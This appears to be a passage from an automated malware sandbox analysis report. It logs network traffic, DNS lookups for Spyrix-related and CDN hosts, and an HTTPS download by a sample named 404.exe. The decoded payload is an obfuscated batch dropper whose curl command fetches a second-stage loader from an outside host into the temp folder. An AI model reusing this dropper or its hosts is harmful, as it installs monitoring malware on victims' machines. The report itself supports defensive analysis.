                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.296819925 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.296838999 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.296899080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.296920061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.296941042 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.299287081 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.380913019 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.380938053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.381068945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.381100893 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.381151915 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.381407976 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.381423950 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.381463051 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.381469965 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.381510019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.381510019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.382044077 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.382059097 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.382131100 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.382138014 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.382181883 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.383420944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.383436918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.383517027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.383524895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.383580923 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.383795977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.383810997 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.383860111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.383867025 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.383917093 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.384588003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.384604931 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.384648085 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.384661913 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.384696007 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.385803938 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.385827065 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.385862112 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.385874987 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.385890961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.385931015 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.387564898 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.387583971 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.387634039 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.387645006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.387660027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.387936115 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.488598108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.488625050 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.488729000 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.488758087 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.488833904 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.488920927 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.488936901 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.489013910 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.489022970 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.489090919 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.489501953 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.489520073 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.489619017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.489631891 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.489675045 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.489973068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.489995003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.490083933 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.490097046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.490151882 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.490963936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.490979910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.491033077 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.491045952 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.491061926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.491080999 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.491148949 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.492024899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.492042065 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.492105961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.492117882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.492175102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.493050098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.493073940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.493140936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.493140936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.493154049 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.538245916 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.578974962 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.579000950 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.579065084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.579091072 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.579153061 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.579638958 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.579659939 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.579696894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.579716921 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.579732895 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.579756021 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.580102921 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.580120087 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.580190897 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.580203056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.580239058 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.580840111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.580856085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.580902100 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.580916882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.580951929 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.581696987 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.581713915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.581753016 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.581768036 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.581782103 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.581784964 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.581803083 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.581808090 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.581820011 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.581836939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.581871986 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.582763910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.582778931 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.582829952 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.582844973 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.582884073 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.583647013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.583664894 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.583709002 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.583722115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.583760023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.585473061 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.669667959 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.669688940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.669789076 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.669821024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.669863939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.670205116 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.670222044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.670277119 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.670286894 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.670320034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.670707941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.670728922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.670783043 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.670792103 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.670825958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.671428919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.671446085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.671495914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.671508074 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.671541929 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.672271967 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.672287941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.672338009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.672350883 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.672382116 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.673187971 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.673207998 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.673259020 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.673270941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.673283100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.673300982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.673305035 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.673317909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.673335075 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.673371077 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.674261093 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.674277067 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:59.674359083 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:24.962116003 CEST192.168.2.71.1.1.10x44e5Standard query (0)filedn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:37.741622925 CEST192.168.2.71.1.1.10x51f7Standard query (0)cdnbaynet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.386451006 CEST192.168.2.71.1.1.10x21ebStandard query (0)swtb-download.spyrix-sfk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:21.470566988 CEST192.168.2.71.1.1.10xd3eStandard query (0)dashboard.spyrix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:21.470732927 CEST192.168.2.71.1.1.10xb576Standard query (0)dashboard.spyrix.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:21.927078009 CEST192.168.2.71.1.1.10x49ffStandard query (0)spyrix.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:22.450556040 CEST192.168.2.71.1.1.10x9acdStandard query (0)cdn.cdndownload.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:22.450834036 CEST192.168.2.71.1.1.10x80cbStandard query (0)cdn.cdndownload.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:24.451543093 CEST192.168.2.71.1.1.10x4709Standard query (0)cdn.cdndownload.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:24.451688051 CEST192.168.2.71.1.1.10x8a40Standard query (0)cdn.cdndownload.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:25.638103962 CEST192.168.2.71.1.1.10x845eStandard query (0)dashboard.spyrix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:25.638254881 CEST192.168.2.71.1.1.10x7bc4Standard query (0)dashboard.spyrix.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:25.714787960 CEST192.168.2.71.1.1.10xbc5cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:25.715009928 CEST192.168.2.71.1.1.10x875bStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:38.227751017 CEST192.168.2.71.1.1.10x14b6Standard query (0)spyrix.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:24.978707075 CEST1.1.1.1192.168.2.70x44e5No error (0)filedn.com23.109.93.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:37.760557890 CEST1.1.1.1192.168.2.70x51f7No error (0)cdnbaynet.com167.114.14.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:39.397809982 CEST1.1.1.1192.168.2.70x21ebNo error (0)swtb-download.spyrix-sfk.com167.114.14.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:21.490582943 CEST1.1.1.1192.168.2.70xd3eNo error (0)dashboard.spyrix.com158.69.117.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:21.938788891 CEST1.1.1.1192.168.2.70x49ffNo error (0)spyrix.net158.69.117.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:22.499238968 CEST1.1.1.1192.168.2.70x9acdNo error (0)cdn.cdndownload.netcl-e0469d03.edgecdn.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:22.499238968 CEST1.1.1.1192.168.2.70x9acdNo error (0)cl-e0469d03.edgecdn.ru95.181.182.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:22.525718927 CEST1.1.1.1192.168.2.70x80cbNo error (0)cdn.cdndownload.netcl-e0469d03.edgecdn.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:24.500161886 CEST1.1.1.1192.168.2.70x8a40No error (0)cdn.cdndownload.netcl-e0469d03.edgecdn.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:24.507843018 CEST1.1.1.1192.168.2.70x4709No error (0)cdn.cdndownload.netcl-e0469d03.edgecdn.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:24.507843018 CEST1.1.1.1192.168.2.70x4709No error (0)cl-e0469d03.edgecdn.ru95.181.182.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:25.645994902 CEST1.1.1.1192.168.2.70x845eNo error (0)dashboard.spyrix.com158.69.117.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:25.721520901 CEST1.1.1.1192.168.2.70x875bNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:25.721626043 CEST1.1.1.1192.168.2.70xbc5cNo error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Oct 2, 2024 06:28:38.239337921 CEST1.1.1.1192.168.2.70x14b6No error (0)spyrix.net158.69.117.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          0192.168.2.74970223.109.93.1004436276C:\Users\user\Desktop\404.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:25:26 UTC111OUTGET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s148 HTTP/1.1
                                                                                                                                                                                                                                                          Host: filedn.com
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          2024-10-02 04:25:26 UTC393INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: CacheHTTPd v1.0
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:25:26 +0000
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 13827
                                                                                                                                                                                                                                                          Etag: "96f78fbb8f479e7d1c2a71a1226c1bc0507ca865"
                                                                                                                                                                                                                                                          Expires: Wed, 02 Oct 2024 10:25:26 +0000
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="s148"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Content-Transfer-Encoding: binary
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Keep-Alive: timeout=30
                                                                                                                                                                                                                                                          2024-10-02 04:25:26 UTC4096INData Raw: 72 65 6d 20 6f 69 68 75 6c 32 65 68 6f 6d 79 31 72 64 38 76 72 69 31 32 65 6b 6a 71 70 6f 62 38 65 63 6d 32 71 38 7a 35 6c 78 73 66 39 73 74 64 68 71 6b 68 34 72 77 36 73 36 75 6b 68 70 72 72 31 79 30 30 61 69 33 72 39 65 65 64 35 36 35 31 76 6a 67 38 78 69 67 71 30 79 30 34 77 77 69 75 32 64 78 7a 65 66 69 73 6d 67 35 70 30 33 32 6d 66 72 72 38 64 0d 0a 72 65 6d 20 74 64 73 63 7a 63 72 32 6c 39 34 68 68 30 6d 62 7a 36 79 64 6f 31 71 6a 70 6b 65 32 71 6e 6e 36 6c 70 61 71 74 71 71 73 63 6e 6b 79 69 30 34 73 76 62 39 30 6d 38 6d 62 62 30 32 38 72 7a 78 6d 6b 37 66 61 62 69 6c 6d 39 30 37 71 38 6a 64 77 67 69 71 36 73 36 61 75 78 6c 77 75 74 72 33 61 72 72 37 31 6e 61 6a 65 74 0d 0a 40 65 63 68 6f 20 6f 66 66 0d 0a 72 65 6d 20 78 65 71 74 78 30 30 65 68 38
                                                                                                                                                                                                                                                          Data Ascii: rem oihul2ehomy1rd8vri12ekjqpob8ecm2q8z5lxsf9stdhqkh4rw6s6ukhprr1y00ai3r9eed5651vjg8xigq0y04wwiu2dxzefismg5p032mfrr8drem tdsczcr2l94hh0mbz6ydo1qjpke2qnn6lpaqtqqscnkyi04svb90m8mbb028rzxmk7fabilm907q8jdwgiq6s6auxlwutr3arr71najet@echo offrem xeqtx00eh8
                                                                                                                                                                                                                                                          2024-10-02 04:25:26 UTC4096INData Raw: 6d 61 32 6e 6e 72 36 30 65 76 76 35 31 34 64 75 72 34 6f 73 7a 79 73 74 70 76 61 68 61 64 35 78 66 64 6e 6c 34 6b 76 6e 35 30 64 78 77 69 63 66 7a 30 64 78 68 6d 65 65 6a 69 74 74 74 6e 30 30 64 0d 0a 63 75 72 6c 2e 65 78 65 20 2d 2d 69 6e 73 65 63 75 72 65 20 2d 2d 75 73 65 72 2d 61 67 65 6e 74 20 22 73 66 6b 2d 64 73 74 2d 6c 6f 61 64 65 72 2d 32 2e 30 22 20 2d 6f 20 22 25 54 45 4d 50 25 5c 25 66 68 6a 70 30 66 25 5c 6c 22 20 68 74 74 70 73 3a 2f 2f 63 64 6e 62 61 79 6e 65 74 2e 63 6f 6d 2f 6c 6f 61 64 65 72 2f 6c 69 6e 6b 2e 70 68 70 3f 70 72 67 5f 69 64 3d 73 66 6b 0d 0a 72 65 6d 20 62 63 6f 7a 61 7a 38 62 39 38 67 6e 75 31 35 74 65 6a 65 6c 72 63 72 79 39 6e 36 65 77 37 72 38 38 34 74 76 74 75 6a 31 74 64 69 68 77 35 73 34 39 34 63 39 31 30 7a 32 0d
                                                                                                                                                                                                                                                          Data Ascii: ma2nnr60evv514dur4oszystpvahad5xfdnl4kvn50dxwicfz0dxhmeejitttn00dcurl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "%TEMP%\%fhjp0f%\l" https://cdnbaynet.com/loader/link.php?prg_id=sfkrem bcozaz8b98gnu15tejelrcry9n6ew7r884tvtuj1tdihw5s494c910z2
